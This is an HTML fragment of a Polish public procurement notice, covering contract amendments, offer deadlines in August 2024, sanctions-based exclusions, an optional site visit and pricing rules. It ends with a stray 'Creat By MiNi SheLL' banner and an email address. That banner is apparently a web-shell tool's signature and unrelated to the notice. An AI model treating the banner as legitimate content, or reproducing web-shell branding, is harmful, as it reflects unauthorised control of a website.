<h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza wprowadzenie zmian umowy w sytuacjach określonych w art. 455 ustawy PZP oraz w ROZDZIALE<br/>IV SWZ - PROJEKTOWANE POSTANOWIENIA UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/pn/pzh</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - z postępowania o udzielenie zamówienia wyklucza się Wykonawców w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>2. Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w celu umożliwienia Wykonawcom sprawdzenia zapoznania się ze stanem technicznym obiektów, dokonania oględzin i pomiarów oraz sposobem wykonania usług będących przedmiotem postępowania oraz skalkulowania ceny oferty.<br/>Odbycie wizji lokalnej jest nieobowiązkowe.<br/>Szczegółowe informacje dotyczące wizji lokalnej zostały opisane w pkt. 4.5. SWZ.<br/>3. Zamawiający wymaga, aby zamówienie zostało wykonane od dnia zawarcia umowy przez okres 24 miesięcy, jednakże nie wcześniej niż od 12 września 2024 r.<br/>4. W celu doprecyzowania: Kryterium oceny ofert Cena = 85% dotyczy - Cena za wykonywanie zamówienia podstawowego (Cn).<br/>5. Szacunkowa wartość zamówienia wskazana w niniejszym ogłoszeniu dotyczy kwoty netto (zamówienia podstawowego i opcjonalnego).<br/>6. Maksymalna kwota wynagrodzenia Wykonawcy za prawidłowe wykonanie całego przedmiotu zamówienia (podstawowego przedmiotu zamówienia i usługami objętymi prawem opcji) jest kwotą równą 150 % szacowanej wartości zamówienia podstawowego powiększonego o wartość podatku VAT.

Creat By MiNi SheLL
Email: jattceo@gmail.com